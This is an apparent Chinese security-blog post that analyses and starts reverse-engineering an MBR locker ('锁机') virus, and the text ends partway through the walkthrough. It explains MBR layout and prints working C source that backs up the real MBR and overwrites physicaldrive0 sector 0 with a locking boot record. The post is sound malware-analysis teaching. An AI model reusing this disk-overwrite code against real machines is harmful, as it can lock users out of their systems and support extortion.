<!DOCTYPE html>
<html lang="">
    <!-- title -->




<!-- keywords -->




<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="HackPluto">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="HackPluto">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content>
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>MBR病毒分析与逆向 · HackPluto&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href="/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="stylesheet" href="/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href="/assets/favicon.ico">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js" as="script">
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/">HackPluto&#39;s Blog</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">MBR病毒分析与逆向</a>
            </div>
    </div>
    
    <a class="home-link" href="/">HackPluto's Blog</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/2.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            MBR病毒分析与逆向
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class="post-intro-tags">
    
        <a class="post-tag" href="javascript:void(0);" data-tags="MBR,病毒">MBR,病毒</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">3.6k</span>阅读时长: <span class="post-count reading-time">13 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2020/12/04</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <h1 id="MBR锁机病毒原理分析与逆向分析"><a href="#MBR锁机病毒原理分析与逆向分析" class="headerlink" title="MBR锁机病毒原理分析与逆向分析"></a>MBR锁机病毒原理分析与逆向分析</h1><p>本文将介绍MBR相关知识以及MBR病毒原理，并且使用静态与动态两种方式分析一个MBR锁机病毒</p>
<h2 id="MBR相关知识"><a href="#MBR相关知识" class="headerlink" title="MBR相关知识"></a>MBR相关知识</h2><h3 id="MBR"><a href="#MBR" class="headerlink" title="MBR"></a>MBR</h3><p>主引导记录中(446 byte)包含了硬盘的一系列参数和一段引导程序。引导程序主要是用来在系统硬件自检完后引导具有激活标志的分区上的操作系统。它执行到最后的是一条JMP指令跳到操作系统的引导程序去。这里往往是引导型病毒的注入点，也是各种多系统引导程序的注入点。但是由于引导程序本身完成的功能比较简单，所以我们可以完全地判断该引导程序的合法性(看JMP指令的合法性)，因而也易于修复。</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201203163043.png" alt></p>
<h3 id="操作系统启动流程"><a href="#操作系统启动流程" class="headerlink" title="操作系统启动流程"></a>操作系统启动流程</h3><ul>
<li><ol>
<li>开机;</li>
</ol>
</li>
<li><ol start="2">
<li>BIOS加电自检(POST—Power On Self Test),内存地址为0fff:0000;</li>
</ol>
</li>
<li><ol start="3">
<li>将硬盘第一个扇区(0头0道1扇区,也就是Boot Sector)读入内存地址0000:7c00处;</li>
</ol>
</li>
<li><ol start="4">
<li>检查(WORD)0000:7dfe是否等于0xaa55.若不等于则转去尝试其他介质;如果没有其他启动介质,则显示 ”No ROM BASIC” ,然后死机;</li>
</ol>
</li>
<li><ol start="5">
<li>跳转到0000:7c00处执行MBR中的程序;</li>
</ol>
</li>
<li><ol start="6">
<li>MBR先将自己复制到某位置处(有很多种情况),然后继续执行;</li>
</ol>
</li>
<li><ol start="7">
<li>在主分区表中搜索标志为活动的分区.如果发现没有活动分区或者不止一个活动分区,则停止;</li>
</ol>
</li>
<li><ol start="8">
<li>将活动分区的第一个扇区读入内存地址0000:7c00处;</li>
</ol>
</li>
<li><ol start="9">
<li>检查(WORD)0000:7dfe是否等于0xaa55,若不等于则显示 “Missing Operating System”,然后停止,或尝试软盘启动;</li>
</ol>
</li>
<li><ol start="10">
<li>跳转到0000:7c00处继续执行特定系统的启动程序;</li>
</ol>
</li>
<li><ol start="11">
<li>启动系统.</li>
</ol>
</li>
</ul>
<p>以上步骤中(2),(3),(4),(5)步由BIOS的引导程序完成;(6),(7),(8),(9),(10)步由MBR中的引导程序完成.</p>
<h3 id="什么是MBR锁机病毒"><a href="#什么是MBR锁机病毒" class="headerlink" title="什么是MBR锁机病毒"></a>什么是MBR锁机病毒</h3><p>MBR病毒是指寄生在磁盘引导区或主引导区的计算机病毒。病毒利用系统引导时，不对主引导区内容正确与否进行判别的缺点从而入侵系统，勒索或进行其它破坏。</p>
<h2 id="病毒原理"><a href="#病毒原理" class="headerlink" title="病毒原理"></a>病毒原理</h2><p>主引导区共512字节，结构体如下：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> _<span class="title">MBR</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span> BootRecord[<span class="number">440</span>]; <span class="comment">// 引导程序</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span> ulSigned[<span class="number">4</span>];  <span class="comment">// Windows磁盘签名</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span> sReserve[<span class="number">2</span>]; <span class="comment">// 保留位</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span> Dpt[<span class="number">64</span>];  <span class="comment">// 分区表</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span> EndSign[<span class="number">2</span>];    <span class="comment">// 结束标志</span></span><br><span class="line">&#125;MBR, *PMBR;</span><br></pre></td></tr></table></figure></p>
<p>引导程序：0x0——0x1b7（MBR的前440个字节），引导程序会判断MBR的有效性，判断磁盘分区的合法性，并且把控制权交给操作系统。</p>
<p>磁盘签名：0x1b8——0x1bb（4字节），Windows依靠磁盘签名来识别硬盘。如果该签名丢失，则Windows认为该磁盘没有被初始化，是没法开机的。</p>
<p>保留位：0x1bc——0x1bd（2字节）</p>
<p>分区表：0x1be——0x1fd（64字节）,分区表被称为DPT（DiskPartition Table），它在MBR中是一个非常关键的数据结构。分区表是用来管理硬盘分区的，如果丢失或者被破坏的话，硬盘的分区就会丢失。</p>
<p>结束标志：0x1fe——0x1ff（2字节），DPT后面两个字节，“55 AA”</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201203164446.png" alt></p>
<p>为了更好的了解MBR病毒的原理，我在网上找到了一个开源的MBR病毒的源码，核心部分如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span>  KeySize 0xEB</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span>  Key (KeySize+1)</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> _DEBUG</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> new DEBUG_NEW</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">ReadDisk</span><span class="params">(<span class="keyword">int</span> Id, <span class="keyword">int</span> num, <span class="keyword">unsigned</span> <span class="keyword">char</span> *buffer)</span></span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">WriteDisk</span><span class="params">(<span class="keyword">int</span> Id, <span class="keyword">int</span> num, <span class="keyword">unsigned</span> <span class="keyword">char</span>* buffer)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">void</span> CLock_DiskDlg::OnBnClickedButton1()</span><br><span class="line">&#123;</span><br><span class="line">    CString c_Str;</span><br><span class="line">    CStringA c_StrA;</span><br><span class="line">    <span class="keyword">char</span> ckeys[<span class="number">256</span>] = &#123; <span class="number">0</span> &#125;;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span> cMbr[<span class="number">512</span>] = &#123; <span class="number">0</span> &#125;;</span><br><span class="line">    <span class="keyword">int</span> nLen; <span class="comment">//锁里面的密码长度只有8位</span></span><br><span class="line"></span><br><span class="line">    GetDlgItemText(IDC_EDIT1, c_Str);</span><br><span class="line">    c_StrA = c_Str;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">memcpy</span>(ckeys, c_StrA.GetBuffer(c_StrA.GetLength()), c_StrA.GetLength());</span><br><span class="line">    nLen = <span class="built_in">strlen</span>(ckeys);</span><br><span class="line">    <span class="keyword">if</span> (nLen == <span class="number">0</span> || nLen &gt;= <span class="number">10</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        MessageBoxA(<span class="number">0</span>, <span class="string">"密码应在0-10位"</span>,<span class="number">0</span> , <span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//对锁进行加工</span></span><br><span class="line">    lock_disk[KeySize] = nLen;</span><br><span class="line">    <span class="built_in">memcpy</span>(&amp;lock_disk[Key], ckeys, nLen);</span><br><span class="line">    <span class="keyword">if</span> (ReadDisk(<span class="number">0</span>, <span class="number">1</span>, cMbr) == <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        getchar();</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    WriteDisk(<span class="number">2</span>, <span class="number">1</span>, cMbr);</span><br><span class="line">    WriteDisk(<span class="number">0</span>, <span class="number">1</span>, lock_disk);</span><br><span class="line">    MessageBoxA(<span class="number">0</span>,<span class="string">"加锁成功！勿重复加！"</span>,<span class="number">0</span>,<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">ReadDisk</span><span class="params">(<span class="keyword">int</span> Id, <span class="keyword">int</span> num, <span class="keyword">unsigned</span> <span class="keyword">char</span> *buffer)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">    读取扇区</span></span><br><span class="line"><span class="comment">    id = ID号</span></span><br><span class="line"><span class="comment">    num = 读取数量</span></span><br><span class="line"><span class="comment">    成功返回读取字节数</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    HANDLE hFile = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="keyword">int</span> offset = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">int</span> ReadSize = <span class="number">0</span>;</span><br><span class="line">    DWORD Readed = <span class="number">0</span>;</span><br><span class="line">    offset = Id * <span class="number">512</span>;</span><br><span class="line">    ReadSize = num * <span class="number">512</span>;</span><br><span class="line">    <span class="keyword">if</span> (buffer == <span class="literal">NULL</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">return</span> ReadSize;</span><br><span class="line">    &#125;</span><br><span class="line">    hFile = CreateFileA(<span class="string">"\\\\.\\\\physicaldrive0"</span>,</span><br><span class="line">        GENERIC_READ,</span><br><span class="line">        FILE_SHARE_READ | FILE_SHARE_WRITE, <span class="literal">NULL</span>, OPEN_EXISTING,</span><br><span class="line">        FILE_ATTRIBUTE_NORMAL, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="keyword">if</span> (hFile == INVALID_HANDLE_VALUE)</span><br><span class="line">    &#123;</span><br><span class="line">        MessageBoxA(<span class="number">0</span>, <span class="string">"不能打开 \\\\.\\\\physicaldrive0"</span>, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    SetFilePointer(hFile, offset, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">    ReadFile(hFile, buffer, ReadSize, &amp;Readed, <span class="literal">NULL</span>);</span><br><span class="line">    CloseHandle(hFile);</span><br><span class="line">    <span class="keyword">return</span> Readed;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">WriteDisk</span><span class="params">(<span class="keyword">int</span> Id, <span class="keyword">int</span> num, <span class="keyword">unsigned</span> <span class="keyword">char</span>* buffer)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">    写扇区</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    HANDLE hFile = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="keyword">int</span> WriteSize = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">int</span> offset = <span class="number">0</span>;</span><br><span class="line">    DWORD Writed = <span class="number">0</span>;</span><br><span class="line">    offset = Id * <span class="number">512</span>;</span><br><span class="line">    WriteSize = num * <span class="number">512</span>;</span><br><span class="line">    <span class="keyword">if</span> (buffer == <span class="literal">NULL</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">return</span> WriteSize;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//打开</span></span><br><span class="line">    hFile = CreateFileA(<span class="string">"\\\\.\\\\\physicaldrive0"</span>, <span class="number">1073741824</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">3</span>, <span class="number">128</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> (hFile == INVALID_HANDLE_VALUE)</span><br><span class="line">    &#123;</span><br><span class="line">        MessageBoxA(<span class="number">0</span>, <span class="string">"不能打开 \\\\.\\\\physicaldrive0"</span>, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    SetFilePointer(hFile, offset, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">    WriteFile(hFile, buffer, WriteSize, &amp;Writed, <span class="number">0</span>);</span><br><span class="line">    CloseHandle(hFile);</span><br><span class="line">    <span class="keyword">return</span> WriteSize;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>关于这行代码有一点需要解释<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">hFile = CreateFileA(<span class="string">"\\\\.\\\\physicaldrive0"</span>,</span><br><span class="line">    GENERIC_READ,</span><br><span class="line">    FILE_SHARE_READ | FILE_SHARE_WRITE, <span class="literal">NULL</span>, OPEN_EXISTING,</span><br><span class="line">    FILE_ATTRIBUTE_NORMAL, <span class="literal">NULL</span>);</span><br></pre></td></tr></table></figure></p>
<p>\\，实际上是一个反斜杠，因此真实路径名是\\.\\physicaldrive0,这个路径就是引导扇区的路径</p>
<p>通过这个代码我们可以看出来这个病毒的逻辑是先读取磁盘MBR的内容然后将MBR存储在某一个空闲分区中，然后将自己的恶意引导程序覆盖到原来MBR引导程序的位置这样系统启动的时候就会先加载恶意的引导程序。</p>
<p>这个引导程序是使用汇编编写在上面的代码中并没有展示，具有的功能通常包括提示输入密码，验证密码，如果密码正确恢复正常的MBR不正确则进行别的操作等。</p>
<h2 id="逆向分析"><a href="#逆向分析" class="headerlink" title="逆向分析"></a>逆向分析</h2><p>现在我们已经拿到了一个病毒样本</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201203171805.png" alt></p>
<p>在XP虚拟机中运行该病毒，虚拟机自动关机，重新启动后，出现这样一个界面，发现需要输入密码</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201203172048.png" alt></p>
<p>对于这个样本，我的逆向目标有三个：</p>
<ul>
<li><ol>
<li>找到开机的密码</li>
</ol>
</li>
<li><ol start="2">
<li>分析出该病毒主要的工作逻辑</li>
</ol>
</li>
<li><ol start="3">
<li>分析出覆盖后MBR中的内容</li>
</ol>
</li>
</ul>
<p>对于目标1，首先我采用的方法是查看IDA中的字符串窗口看有没有可疑的字符串，因为一般黑客设置的密码如果是静态写在二进制文件中的一般是具有某种意义或者具有关键字的字符串不会是一串随机字符</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201203172530.png" alt></p>
<p>由于该二进制文件还是比较大的，去除掉函数名和乱码字符后字符串数量仍然很多，试了几个我觉得很像密码的字符串后发现都不对，我也就放弃了这个思路，换了一个方向-——先去研究这个病毒的工作逻辑</p>
<h3 id="逆向思路"><a href="#逆向思路" class="headerlink" title="逆向思路"></a>逆向思路</h3><p>使用IDA打开这个文件后发现函数数量很多</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201203172833.png" alt></p>
<p>如果直接从main函数开始分析显然是不合理的，所以我这里采取的思路是抓关键，分析重点</p>
<p>从前面的开源代码中我们可以看到MBR病毒关键的点有读取MBR内容，写MBR内容，重新启动，但是还有一部分在开源代码中并没有展示出来就是提权，只有提权了才可以实现最后关机的功能，所以我逆向这个二进制程序关注的点以及被聚焦在四个方面：</p>
<ul>
<li>1.读MBR</li>
<li>2.写MBR</li>
<li>3.提权</li>
<li>4.关机</li>
</ul>
<p>接下来将逐一进行分析</p>
<h3 id="读写扇区"><a href="#读写扇区" class="headerlink" title="读写扇区"></a>读写扇区</h3><p>通过在OD中查找特征字符串，可以看到恶意代码在读写扇区前先将自己准备好的恶意MBR从二进制文件中拷贝进了内存中。</p>
<p>针对读写扇区函数的定位主要是通过特征字符串先大致定位函数位置，从开源代码中我们可以看到，针对扇区的操作一定会使用到 <strong>physicaldrive0</strong> 字符串，所以从这个字符串作为切入点</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201203225838.png" alt></p>
<p>可以看到有两个函数都使用了这个字符串，进一步分析后两个函数长得很像，而且函数逻辑很复杂使用了很多被调函数，这个地方我使用OD动态调试配合winhex查看扇区内容，根据逻辑程序一定是先读扇区再写扇区，所以我在两个函数的地方下断点先运行到哪个函数，哪个就是读扇区，通过调试发现sub_004014F4函数，并且在运行完另一个函数后MBR出现了改变所以我们正确定位到了MBR的读写函数</p>
<p>MBR改变前后：<br><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201203232402.png" alt></p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201203232541.png" alt></p>
<p>首先分析读MBR函数</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201203233303.png" alt></p>
<p>这行代码从传入的参数就可以判断出是一个实现CreateFileA函数的功能，因为sub_4019B0函数十分复杂，所以我认为这个函数并不是简单的对CreateFileA函数进行的一个封装需要进一步分析</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201203232958.png" alt></p>
<p>进入sub_4019B0后发现程序通过索引的方式将一个变量赋值为字符串“CreatFileA”</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201203235607.png" alt></p>
